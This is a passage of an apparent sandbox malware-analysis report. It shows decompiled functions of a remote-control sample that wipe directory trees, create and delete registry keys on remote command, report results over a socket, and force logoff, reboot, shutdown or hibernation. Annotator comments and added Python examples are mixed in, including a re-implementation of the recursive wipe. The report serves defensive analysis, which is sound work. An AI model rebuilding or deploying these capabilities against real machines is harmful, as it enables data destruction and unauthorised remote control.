                      						L22:
                      						_t68 = _v5;
                      						goto L23;
                      					}
                      					_t107 =  &(_v1644.cFileName);
                      					_t120 = _t107;
                      					do {
                      						_t72 =  *_t107;
                      						_t107 = _t107 + 2;
                      					} while (_t72 != 0);
                      					_t108 = _t107 - _t120;
                      					_t112 =  &_v532 - 2;
                      					do {
                      						_t73 =  *(_t112 + 2);
                      						_t112 = _t112 + 2;
                      					} while (_t73 != 0);
                      					_t95 = _t108 >> 2;
                      					memcpy(_t112, _t120, _t95 << 2);
                      					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
                      					_t124 = _t124 + 0x18;
                      					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                      						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                      							SetFileAttributesW( &_v532, 0x80);
                      						}
                      						if(DeleteFileW( &_v532) == 0) {
                      							goto L33;
                      						} else {
                      							_t100 = 0;
                      							do {
                      								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
                      								_t100 = _t100 + 2;
                      								 *(_t123 + _t100 - 0x212) = _t78;
                      							} while (_t78 != 0);
                      							goto L22;
                      						}
                      					}
                      					if(E00757754( &_v532) == 0) {
                      						goto L33;
                      					}
                      					RemoveDirectoryW( &_v532);
                      					_t102 = 0;
                      					do {
                      						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
                      						_t102 = _t102 + 2;
                      						 *(_t123 + _t102 - 0x212) = _t84;
                      					} while (_t84 != 0);
                      					goto L22;
                      					L23:
                      				} while (_t68 != 0);
                      				FindClose(_t86);
                      				return RemoveDirectoryW(_v12);
			}

                      Instruction addresses for the listing above, one per line of the function body (0x00000000 where a line, such as a goto, has no address of its own):
                      0x00757768 0x0075776b 0x0075776d 0x0075776f 0x0075776f 0x00757772 0x00757776 0x00757779
                      0x00757784 0x00757789 0x00757789 0x0075778d 0x00757790 0x00757795 0x007577a0 0x007577a2
                      0x007577a4 0x007577aa 0x007577ae 0x007577b0 0x007577b0 0x007577b3 0x007577b7 0x007577ba
                      0x007577c5 0x007577ca 0x007577ca 0x007577ce 0x007577d1 0x007577d6 0x007577db 0x007577f1
                      0x007577f6 0x0075793e 0x00000000 0x0075793e 0x007577fc 0x007577fe 0x007577fe 0x00757806
                      0x00757809 0x00757811 0x00757816 0x0075781a 0x0075782a 0x0075792e 0x00757937 0x00757938
                      0x00000000 0x00757938 0x00757930 0x00757932 0x00000000 0x00757932 0x0075783d 0x007578be
                      0x007578be 0x00000000 0x007578be 0x0075783f 0x00757847 0x00757849 0x00757849 0x0075784c
                      0x0075784f 0x0075785a 0x0075785c 0x0075785f 0x0075785f 0x00757863 0x00757866 0x0075786d
                      0x00757870 0x0075787e 0x0075787e 0x00757880 0x007578e2 0x007578f0 0x007578f0 0x00757905
                      0x00000000 0x00757907 0x00757909 0x0075790b 0x0075790b 0x00757913 0x00757916 0x0075791e
                      0x00000000 0x00757923 0x00757905 0x0075788f 0x00000000 0x00000000 0x0075789c 0x007578a4
                      0x007578a6 0x007578a6 0x007578ae 0x007578b1 0x007578b9 0x00000000 0x007578c1 0x007578c1
                      0x007578ca 0x00000000

                      APIs
                      • FindFirstFileW.KERNEL32(?,?,?,?,007AC238), ref: 007577EB
                      • FindNextFileW.KERNEL32(00000000,?,?,?,007AC238), ref: 00757822
                      • RemoveDirectoryW.KERNEL32(?,?,?,007AC238), ref: 0075789C
                      • FindClose.KERNEL32(00000000,?,?,007AC238), ref: 007578CA
                      • RemoveDirectoryW.KERNEL32(?,?,?,007AC238), ref: 007578D3
                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,007AC238), ref: 007578F0
                      • DeleteFileW.KERNEL32(?,?,?,007AC238), ref: 007578FD
                      • GetLastError.KERNEL32(?,?,007AC238), ref: 00757925
                      • FindClose.KERNEL32(00000000,?,?,007AC238), ref: 00757938
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                      • String ID:
                      • API String ID: 2341273852-0
                      • Opcode ID: 0957099c42ec4b36a5a998f52efdbbd20efd8012f653b8ef5318a2ccbba507bb
                      • Instruction ID: 0ad3ce23b788e248147510633761d2b2658c34fc53e621828640f61af5413d6a
                      • Opcode Fuzzy Hash: 0957099c42ec4b36a5a998f52efdbbd20efd8012f653b8ef5318a2ccbba507bb
                      • Instruction Fuzzy Hash: 8A5128345042198ACF28DF68E8886FAB375FF54305F4081A9DC0993140FBB96E8ECBA4
                      Uniqueness

                      Uniqueness Score: -1.00%
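The routine E00757754 above is a recursive directory wipe: it appends "\*" to the path, walks it with FindFirstFileW/FindNextFileW, stops cleanly only when GetLastError() returns ERROR_NO_MORE_FILES (0x12), skips entries for which E007576DE returns nonzero (presumably the "." and ".." names), clears the read-only bit with SetFileAttributesW(FILE_ATTRIBUTE_NORMAL = 0x80) before DeleteFileW, recurses into anything whose attributes carry bit 0x10 (FILE_ATTRIBUTE_DIRECTORY), and finishes with RemoveDirectoryW. The following portable Python equivalent is an added example, not the sample's code: os.scandir, os.chmod and os.unlink stand in for the Win32 calls, and the temporary tree in demo() is constructed here. One difference is deliberate: the listing tests only the directory bit, so a directory junction or symlinked directory inside the tree would be descended into; the example never follows links.

```python
"""Portable equivalent of the recursive delete routine E00757754 (added example).
Stands in for FindFirstFileW/FindNextFileW, SetFileAttributesW, DeleteFileW and
RemoveDirectoryW with os.scandir, os.chmod, os.unlink and os.rmdir."""
import os
import stat
import tempfile


def _clear_readonly(path: str) -> None:
    # Counterpart of SetFileAttributesW(path, FILE_ATTRIBUTE_NORMAL): a read-only
    # file makes DeleteFileW fail, so the attribute is cleared first. On Windows
    # os.chmod toggles exactly that attribute; on POSIX it adds the owner write bit.
    mode = os.stat(path, follow_symlinks=False).st_mode
    if stat.S_ISLNK(mode):
        return  # never chmod through a link; the link itself is unlinked below
    if not mode & stat.S_IWRITE:
        os.chmod(path, mode | stat.S_IWRITE)


def remove_tree(root: str) -> bool:
    """Delete everything under root depth-first, then root itself.

    Returns False at the first failure, mirroring the listing's FindClose-then-
    return-0 path. Unlike the listing, which checks only FILE_ATTRIBUTE_DIRECTORY
    (0x10), this version does not follow links: a symlink is removed as a file.
    """
    try:
        with os.scandir(root) as it:  # scandir never yields "." or ".."
            entries = list(it)
    except OSError:
        return False
    for entry in entries:
        try:
            if entry.is_dir(follow_symlinks=False):
                if not remove_tree(entry.path):
                    return False
            else:
                _clear_readonly(entry.path)
                os.unlink(entry.path)
        except OSError:
            return False
    try:
        os.rmdir(root)
    except OSError:
        return False
    return True


def demo() -> tuple:
    """Constructed input: nested directories plus a read-only file.
    Returns (wipe_succeeded, root_still_exists)."""
    root = tempfile.mkdtemp(prefix="wipe_demo_")
    leaf = os.path.join(root, "a", "b")
    os.makedirs(leaf)
    locked = os.path.join(leaf, "locked.txt")
    with open(locked, "w") as fh:
        fh.write("x")
    os.chmod(locked, stat.S_IREAD)  # the read-only case the listing handles before DeleteFileW
    return remove_tree(root), os.path.exists(root)
```

On POSIX a read-only file in a writable directory can be unlinked anyway, so the chmod only matters on Windows, which is exactly why the sample bothers with SetFileAttributesW; the demo exercises the path on both.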
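The three function blocks above (the mouse-control dispatcher, E007560DB and E00757754) share one layout: a decompiled body, an "APIs" list in which "Part of subcall function" marks calls made indirectly, and identifying fields such as API ID, String ID and the two fuzzy hashes. A report of this kind carries hundreds of such blocks, and tagging each by the API set it reaches is the quickest way to find the capability you are looking for (input injection, service enumeration, file wiping) before reading any C. The parser and rule table below are an added example, not Joe Sandbox code or a specification of its format; the rules (which API sets imply which capability) are our own choice, and SAMPLE_REPORT is constructed from the API sections of the three functions above with their bodies abridged.

```python
"""Parse Joe Sandbox 'C-Code' function blocks and tag each function's capability
from the Win32 APIs listed for it. Added example; the tagging rules are ours."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

HEADER_RE = re.compile(r"^\s*C-Code - Quality:\s*(\d+)%")
SIG_RE = re.compile(r"^\s*(E[0-9A-F]{8})\([^)]*\)\s*\{")
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-F]{8}):\s*)?"
    r"([A-Za-z_]\w*)\.([A-Z0-9]+)\s*(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]{8})")
FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|Instruction Fuzzy Hash|Opcode Fuzzy Hash):\s*(.*)$")

# via: address of the subcall that issues the call, None when the function calls it directly
ApiCall = namedtuple("ApiCall", "name module args ref via")


@dataclass
class FuncBlock:
    name: str
    quality: int  # -1 when the report shows the function without its header
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self) -> set:
        # Fold the A/W suffix so one rule covers both character-set variants.
        return {re.sub(r"[AW]$", "", a.name) for a in self.apis}


def parse_blocks(text: str) -> list:
    blocks, cur, in_apis = [], None, False
    for line in text.splitlines():
        if not line.strip():
            continue
        if cur is None and not HEADER_RE.match(line):
            cur = FuncBlock(name="(partial)", quality=-1)  # text before the first header
            blocks.append(cur)
        if hm := HEADER_RE.match(line):
            cur = FuncBlock(name="?", quality=int(hm.group(1)))
            blocks.append(cur)
            in_apis = False
        elif cur.name == "?" and (sm := SIG_RE.match(line)):
            cur.name = sm.group(1)
        elif line.strip() == "APIs":
            in_apis = True
        elif in_apis and (am := API_RE.match(line)):
            cur.apis.append(ApiCall(am.group(2), am.group(3), am.group(4) or "", am.group(5), am.group(1)))
        elif fm := FIELD_RE.match(line):
            in_apis = False
            cur.fields[fm.group(1)] = fm.group(2).strip()
        else:
            in_apis = False  # any other line ends the API list
    return blocks


# (tag, APIs that must all be present, APIs of which at least one must be present)
CAPABILITY_RULES = [
    ("remote input injection", set(), {"mouse_event", "SendInput", "keybd_event"}),
    ("service enumeration", {"OpenSCManager", "EnumServicesStatus"}, set()),
    ("recursive directory wipe",
     {"FindFirstFile", "FindNextFile", "DeleteFile", "RemoveDirectory"}, set()),
    ("clears read-only attribute before delete", {"SetFileAttributes", "DeleteFile"}, set()),
]


def classify(block: FuncBlock) -> list:
    names = block.api_names()
    return [tag for tag, need_all, need_any in CAPABILITY_RULES
            if need_all <= names and (not need_any or need_any & names)]


# Constructed sample: the API sections of the three functions above, bodies abridged.
SAMPLE_REPORT = """\
    E0075459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E00745220(2)));
APIs
• StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00754FD8
• mouse_event.USER32 ref: 0075517A
  • Part of subcall function 00754E1E: GetSystemMetrics.USER32 ref: 00754E53
  • Part of subcall function 00755250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 0075527C
Similarity
• API ID: MetricsSystem$InputSendmouse_event
• String ID: 0$1$2$3$4$5$6
C-Code - Quality: 94%
    E007560DB(intOrPtr __ecx) {
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,007ABACC,007AC998), ref: 007560F2
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00755BDC,?), ref: 00756139
• OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,007A59C4,00000000,007A59C4,00000000,007A59C4,?,007ABACC,007AC998), ref: 00756248
• API ID: EnumOpenServicesStatus$ErrorLastManagerService
C-Code - Quality: 100%
    E00757754(WCHAR* __ecx) {
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,007AC238), ref: 007577EB
• FindNextFileW.KERNEL32(00000000,?,?,?,007AC238), ref: 00757822
• RemoveDirectoryW.KERNEL32(?,?,?,007AC238), ref: 0075789C
• SetFileAttributesW.KERNEL32(?,00000080,?,?,007AC238), ref: 007578F0
• DeleteFileW.KERNEL32(?,?,?,007AC238), ref: 007578FD
• Instruction Fuzzy Hash: 8A5128345042198ACF28DF68E8886FAB375FF54305F4081A9DC0993140FBB96E8ECBA4
"""
```

Subcall entries are kept with their `via` address rather than dropped, because that is how the mouse-control block reaches SendInput: the dispatcher itself only calls mouse_event, and a rule that ignored indirect calls would miss the SendInput path through 00755250. The captured Instruction Fuzzy Hash is what you would pivot on to find the same function in other dumps.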

                      C-Code - Quality: 78%
                      			E00751205(void* __edx, void* __eflags, char _a8) {
                      				char _v36;
                      				char _v48;
                      				char _v52;
                      				char _v68;
                      				char _v76;
                      				char _v80;
                      				char _v84;
                      				char _v88;
                      				char _v92;
                      				char _v96;
                      				char _v100;
                      				struct _SECURITY_ATTRIBUTES _v104;
                      				char _v108;
                      				void* _v112;
                      				char _v120;
                      				intOrPtr _v124;
                      				char _v128;
                      				void* __ebx;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr* _t77;
                      				void* _t88;
                      				void* _t99;
                      				void* _t101;
                      				void* _t102;
                      				void* _t104;
                      				signed int _t105;
                      				void* _t113;
                      				void* _t120;
                      				void* _t121;
                      				void* _t123;
                      				void* _t127;
                      				signed short* _t135;
                      				void* _t137;
                      				void* _t141;
                      				void* _t146;
                      				void* _t150;
                      				void* _t152;
                      				void* _t153;
                      				void* _t155;
                      				signed int _t156;
                      				intOrPtr* _t158;
                      				void* _t160;
                      				void* _t162;
                      				void* _t163;
                      				void* _t165;
                      				void* _t171;
                      				void* _t173;
                      				void* _t174;
                      				void* _t176;
                      				void* _t181;
                      				void* _t182;
                      				long _t185;
                      				signed short* _t195;
                      				void* _t205;
                      				void* _t217;
                      				void* _t233;
                      				void* _t247;
                      				signed int _t258;
                      				signed int _t313;
                      				signed int _t323;
                      				signed int _t326;
                      				void* _t328;
                      				void* _t330;
                      				void* _t335;
                      				void* _t337;
                      				void* _t339;
                      				signed int _t340;
                      				void* _t341;
                      				signed int _t347;
                      				signed int _t348;
                      				void* _t351;
                      				void* _t352;
                      				void* _t353;
                      				void* _t356;
                      				void* _t361;
                      				void* _t362;
                      				void* _t364;
                      				void* _t365;
                      				void* _t367;
                      				void* _t368;
                      				void* _t369;
                      				void* _t370;
                      				void* _t372;
                      				void* _t374;
                      				void* _t379;
                      
                      				_t379 = __eflags;
                      				_t320 = __edx;
                      				_push(_t203);
                      				_t77 = E00741F95( &_a8);
                      				_push(0xffffffff);
                      				_t328 = 4;
                      				_push(_t328);
                      				_push( &_v52);
                      				E007442A6( &_a8);
                      				_t351 = (_t348 & 0xfffffff8) - 0x44;
                      				E007420EC(_t203, _t351, __edx, _t379, 0x7ac238);
                      				_t352 = _t351 - 0x18;
                      				E007420EC(_t203, _t352, __edx, _t379,  &_v68);
                      				E00757478( &_v108, __edx);
                      				_t353 = _t352 + 0x30;
                      				_t335 =  *_t77 - 0x35; // first character of the command string: 0x35 is ASCII '5'; the -1 steps below select '6', '7', '8' and '9'
                      				if(_t335 == 0) {
                      					E00741F6D(_t203,  &_v76);
                      					__eflags = E007421F5( &_v88) - 1;
                      					if(__eflags > 0) {
                      						E00749DC9(_t203,  &_v80, E00741F95(E00741E49( &_v88, _t320, __eflags, 1)));
                      					}
                      					E007420EC(_t203, _t353 - 0x18, _t320, __eflags, E00741E49( &_v88, _t320, __eflags, 0));
                      					_t88 = E00741EEB( &_v84);
                      					_t320 = 1;
                      					_t217 = _t88;
                      					L37:
                      					E00751046(_t217, _t320, _t386);
                      					L38:
                      					E00741EF0();
                      					L39:
                      					E00741E74( &_v88, _t320);
                      					E00741FC7();
                      					E00741FC7();
                      					return 0;
                      				}
                      				_t337 = _t335 - 1;
                      				if(_t337 == 0) {
                      					_t99 = E00741F95(E00741E49( &_v88, __edx, __eflags, 2));
                      					_t101 = E00741F95(E00741E49( &_v92, __edx, __eflags, 1));
                      					_t330 = 0;
                      					_t102 = E00741E49( &_v96, __edx, __eflags, 0);
                      					_t356 = _t353 - 0x18;
                      					E007420EC(_t203, _t356, _t320, __eflags, _t102);
                      					_t104 = E00750FB5(_t203, __eflags, _t99);
                      					_t320 = _t101;
                      					_t105 = E00750D5C(_t104, _t101);
                      					_t358 = _t356 + 0x18 - 0x18;
                      					_t233 = _t356 + 0x18 - 0x18;
                      					__eflags = _t105;
                      					if(__eflags == 0) {
                      						_push("2");
                      						L33:
                      						E00742084(_t203, _t233);
                      						E00744AA4(_t203, 0x7ac700, _t320, __eflags);
                      						goto L39;
                      					}
                      					_push("1");
                      					L20:
                      					E00742084(_t203, _t233);
                      					E00744AA4(_t203, 0x7ac700, _t320, __eflags);
                      					E007420EC(_t203, _t358 - 0x18, _t320, __eflags, E00741E49( &_v120, _t320, __eflags, _t330));
                      					_t113 = E00741F95(E00741E49( &_v128, _t320, __eflags, 1));
                      					_t320 = 0;
                      					E00751046(_t113, 0, __eflags);
                      					goto L39;
                      				}
                      				_t339 = _t337 - 1;
                      				if(_t339 == 0) {
                      					E0074427F(_t203,  &_v80, E00741F95(E00741E49( &_v88, __edx, __eflags, 1)));
                      				 *0x7abd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW"); // resolved at run time rather than imported; SHDeleteKeyW removes a key together with all of its subkeys
                      					_t120 = E00741EEB( &_v84);
                      					_t121 = E00741E49( &_v96, _t320, __eflags, 0);
                      					_t361 = _t353 - 0x18;
                      					E007420EC(_t203, _t361, _t320, __eflags, _t121);
                      					_t123 = E00750FB5(_t203, __eflags, _t120);
                      					_t362 = _t361 + 0x18;
                      				__eflags =  *0x7abd64(_t123); // SHDeleteKeyW returns ERROR_SUCCESS (0) when the key was deleted
                      				if(__eflags != 0) { // failure: result code "9" goes back through E00744AA4 (send); success falls through to "8"
                      						_t247 = _t362 - 0x18;
                      						_push("9");
                      						L12:
                      						E00742084(_t203, _t247);
                      						E00744AA4(_t203, 0x7ac700, _t320, __eflags);
                      						goto L38;
                      					}
                      					_t127 = E00742489();
                      					_t340 = 2;
                      					_t203 = E0075184C( &_v84, "\\", _t127 - _t340);
                      					__eflags = _t203 - 0xffffffff;
                      					if(__eflags != 0) {
                      						_t50 = _t203 + 1; // 0x1
                      						_push( ~(__eflags > 0) | _t50 * _t340);
                      						_v100 = E0076F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
                      						_t135 = E00741EEB(E00747309( &_v84,  &_v36, 0, _t203));
                      						_t203 = _v112;
                      						_t323 = _v112 - _t135;
                      						__eflags = _t323;
                      						do {
                      							_t258 =  *_t135 & 0x0000ffff;
                      							 *(_t323 + _t135) = _t258;
                      							_t135 = _t135 + _t340;
                      							__eflags = _t258;
                      						} while (__eflags != 0);
                      						E00741EF0();
                      						_t137 = E00741E49( &_v96, _t323, __eflags, 0);
                      						_t364 = _t362 - 0x18;
                      						E007420EC(_t203, _t364, _t323, __eflags, _t137);
                      						_t320 = 0;
                      						__eflags = 0;
                      						E00751046(_t203, 0, 0);
                      						E0076F4CF(_t203);
                      						_t365 = _t364 + 0x1c;
                      						L28:
                      						_t247 = _t365 - 0x18;
                      						_push("8");
                      						goto L12;
                      					}
                      					_t141 = E00741E49( &_v96, _t320, __eflags, 0);
                      					_t367 = _t362 - 0x18;
                      					E007420EC(_t203, _t367, _t320, __eflags, _t141);
                      					_t320 = 0;
                      					E00751046(0, 0, __eflags);
                      					_t365 = _t367 + 0x18;
                      					goto L28;
                      				}
                      				_t341 = _t339 - 1;
                      				if(_t341 == 0) {
                      					_t146 = E00776769(_t144, E00741F95(E00741E49( &_v88, __edx, __eflags, 3)));
                      					__eflags = _t146 - _t328;
                      					if(__eflags == 0) {
                      						_push( *((intOrPtr*)(E00741F95(E00741E49( &_v92, __edx, __eflags, _t328)))));
                      						_t150 = E00741F95(E00741E49( &_v92, __edx, __eflags, 2));
                      						_t152 = E00741F95(E00741E49( &_v96, _t320, __eflags, 1));
                      						_t330 = 0;
                      						__eflags = 0;
                      						_t153 = E00741E49( &_v100, _t320, 0, 0);
                      						_t368 = _t353 - 0x18;
                      						E007420EC(_t203, _t368, _t320, __eflags, _t153);
                      						_t155 = E00750FB5(_t203, __eflags, _t150);
                      						_t369 = _t368 + 0x18;
                      						_t320 = _t152;
                      						_t156 = E00750BF8(_t155, _t152);
                      					} else {
                      						__eflags = _t146 - 0xb;
                      						if(__eflags == 0) {
                      							_t158 = E00741F95(E00741E49( &_v92, __edx, __eflags, _t328));
                      							_t160 = E00741F95(E00741E49( &_v92, __edx, __eflags, 2));
                      							_t162 = E00741F95(E00741E49( &_v96, _t320, __eflags, 1));
                      							_t330 = 0;
                      							_t163 = E00741E49( &_v100, _t320, __eflags, 0);
                      							_t370 = _t353 - 0x18;
                      							E007420EC(_t203, _t370, _t320, __eflags, _t163);
                      							_t165 = E00750FB5(_t203, __eflags, _t160);
                      							_t320 = _t162;
                      							_t156 = E00750C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
                      							_t369 = _t370 + 0x24;
                      						} else {
                      							_push(_t146);
                      							E00741E49( &_v92, __edx, __eflags, _t328);
                      							_push(E00742489());
                      							_push(E00741F95(E00741E49( &_v92, __edx, __eflags, _t328)));
                      							_t171 = E00741F95(E00741E49( &_v96, _t320, __eflags, 2));
                      							_t173 = E00741F95(E00741E49( &_v100, _t320, __eflags, 1));
                      							_t330 = 0;
                      							_t174 = E00741E49( &_v104, _t320, __eflags, 0);
                      							_t372 = _t353 - 0x18;
                      							E007420EC(_t203, _t372, _t320, __eflags, _t174);
                      							_t176 = E00750FB5(_t203, __eflags, _t171);
                      							_t320 = _t173;
                      							_t156 = E00750B08(_t176, _t173);
                      							_t369 = _t372 + 0x28;
                      						}
                      					}
                      					_t358 = _t369 - 0x18;
                      					_t233 = _t369 - 0x18;
                      					__eflags = _t156;
                      					if(__eflags == 0) {
                      						_push("5");
                      						goto L33;
                      					} else {
                      						_push("4");
                      						goto L20;
                      					}
                      				}
                      				_t384 = _t341 != 1;
                      				if(_t341 != 1) {
                      					goto L39;
                      				}
                      				E0074427F(_t203,  &_v80, E00741F95(E00741E49( &_v88, __edx, _t384, 1)));
                      				_t181 = E00741EEB( &_v84);
                      				_t182 = E00741E49( &_v96, __edx, _t384, 0);
                      				_t374 = _t353 - 0x18;
                      				E007420EC(_t203, _t374, __edx, _t384, _t182);
                      				_t185 = RegCreateKeyExW(E00750FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??); // samDesired 0x20006 == KEY_WRITE; a non-zero return yields result code "7", success "6"
                      				RegCloseKey(_v112);
                      				_t376 = _t374 + 0x18 - 0x18;
                      				_t247 = _t374 + 0x18 - 0x18;
                      				_t385 = _t185;
                      				if(_t185 != 0) {
                      					_push("7");
                      					goto L12;
                      				}
                      				E00742084(_t203, _t247, "6");
                      				_push(0x72);
                      				E00744AA4(_t203, 0x7ac700, _t320, _t385);
                      				_t205 = E00747323( &_v108, 0x7ac700, 0x7ac700);
                      				_t386 = _t205 - 0xffffffff;
                      				if(_t205 != 0xffffffff) {
                      					_t14 = _t205 + 1; // 0x1
                      					_t347 = 2;
                      					_push( ~(__eflags > 0) | _t14 * _t347);
                      					_v112 = E0076F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
                      					_t195 = E00741EEB(E00747309( &_v96,  &_v48, 0, _t205));
                      					_t206 = _v124;
                      					_t326 = _v124 - _t195;
                      					__eflags = _t326;
                      					do {
                      						_t313 =  *_t195 & 0x0000ffff;
                      						 *(_t326 + _t195) = _t313;
                      						_t195 = _t195 + _t347;
                      						__eflags = _t313;
                      					} while (__eflags != 0);
                      					E00741EF0();
                      					E007420EC(_t206, _t376 - 0x18, _t326, __eflags, E00741E49( &_v108, _t326, __eflags, 0));
                      					_t320 = 0;
                      					E00751046(_t206, 0, __eflags);
                      					E0076F4CF(_t206);
                      					goto L38;
                      				}
                      				E007420EC(_t205, _t376 - 0x18, _t320, _t386, E00741E49( &_v108, _t320, _t386, 0));
                      				_t320 = 0;
                      				_t217 = 0;
                      				goto L37;
                      			}

                      Instruction addresses: 0x00751205 to 0x007517f0 (one address per decompiled line; per-line alignment lost in extraction)

                      APIs
                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 007512DA
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 007512E6
                        • Part of subcall function 00744AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00744B18
                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 007515C7
                      • GetProcAddress.KERNEL32(00000000), ref: 007515CE
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: AddressCloseCreateLibraryLoadProcsend
                      • String ID: SHDeleteKeyW$Shlwapi.dll
                      • API String ID: 2127411465-314212984
                      • Opcode ID: 57eb539da32291c5571059127d1bc657896d087d29b8c33a2e5f71b8281eca2d
                      • Instruction ID: bba8e5e9b13af6a8a9277b61efe0c9517c78c427f5917ab577091c2e84b512d2
                      • Opcode Fuzzy Hash: 57eb539da32291c5571059127d1bc657896d087d29b8c33a2e5f71b8281eca2d
                      • Instruction Fuzzy Hash: 34E1F676A04300E6CA14F7748C5FABE36A99F95702F80052DFD02A71E3EF6C9949C792
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 62%
                      			E00752BE1(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
                      				void* _t12;
                      				int _t14;
                      				int _t20;
                      				int _t22;
                      				int _t31;
                      				intOrPtr* _t64;
                      				void* _t69;
                      
                      				_t69 = __eflags;
                      				E00753958();
                      				E00741E49( &_a16, __edx, _t69, 0);
                      				_t12 = E00745A6F("0");
                      				_push(0);
                      				_t70 = _t12;
                      				if(_t12 == 0) {
                      					E00741E49( &_a12, "0", __eflags);
                      					_t14 = E00745A6F("1");
                      					_push(0);
                      					__eflags = _t14;
                      					if(__eflags == 0) {
                      						E00741E49( &_a12, "1", __eflags);
                      						__eflags = E00745A6F("2");
                      						if(__eflags == 0) {
                      							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState"); // SetSuspendState(bHibernate, bForce, bWakeupEventsDisabled), resolved at run time
                      							E00741E49( &_a16, "2", __eflags, 0);
                      							_t62 = "3";
                      							_t20 = E00745A6F("3");
                      							_push(0);
                      							__eflags = _t20;
                      							if(__eflags == 0) {
                      								E00741E49( &_a16, "3", __eflags);
                      								_t62 = "4";
                      								_t22 = E00745A6F("4");
                      								__eflags = _t22;
                      								if(_t22 != 0) {
                      									_push(0);
                      									_push(0);
                      									_push(1); // pushed last, so it is the first argument: bHibernate = TRUE (hibernate); the other path passes 0 (sleep)
                      									goto L11;
                      								}
                      							} else {
                      								_push(0);
                      								_push(0);
                      								L11:
                      								 *_t64();
                      							}
                      						} else {
                      							_push(0);
                      							_t31 = E00776769(_t28, E00741F95(E00741E49( &_a16, "2", __eflags, 1))) | 0x00000002; // 0x2 == EWX_REBOOT
                      							__eflags = _t31;
                      							goto L6;
                      						}
                      					} else {
                      						_t31 = E00776769(_t33, E00741F95(E00741E49( &_a12, "1", __eflags, 1))) | 0x00000001; // 0x1 == EWX_SHUTDOWN
                      						goto L6;
                      					}
                      				} else {
                      					_t31 = E00776769(_t36, E00741F95(E00741E49( &_a12, "0", _t70, 1))); // flags used as parsed; 0 == EWX_LOGOFF
                      					L6:
                      					ExitWindowsEx(_t31, ??); // requires SeShutdownPrivilege, which E00753958 enabled at the top of this function
                      				}
                      				_t7 =  &_a16; // 0x744538
                      				E00741E74(_t7, _t62);
                      				E00741FC7();
                      				E00741FC7();
                      				return 0;
                      			}

                      Instruction addresses: 0x00752be1 to 0x007533ed (one address per decompiled line; per-line alignment lost in extraction)

                      APIs
                        • Part of subcall function 00753958: GetCurrentProcess.KERNEL32(00000028,?), ref: 00753965
                        • Part of subcall function 00753958: OpenProcessToken.ADVAPI32(00000000), ref: 0075396C
                        • Part of subcall function 00753958: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0075397E
                        • Part of subcall function 00753958: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0075399D
                        • Part of subcall function 00753958: GetLastError.KERNEL32 ref: 007539A3
                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00752C83
                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00752C98
                      • GetProcAddress.KERNEL32(00000000), ref: 00752C9F
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                      • String ID: 8Et$PowrProf.dll$SetSuspendState
                      • API String ID: 1589313981-3400737069
                      • Opcode ID: 34a545a3177258b2fa92547f911cc9c95e024fd640930b67efcc870b3c55da8d
                      • Instruction ID: f38da873483ce5ca13c666c1d02d7b816db962edc27dfa5228fe21a68ee81e7c
                      • Opcode Fuzzy Hash: 34a545a3177258b2fa92547f911cc9c95e024fd640930b67efcc870b3c55da8d
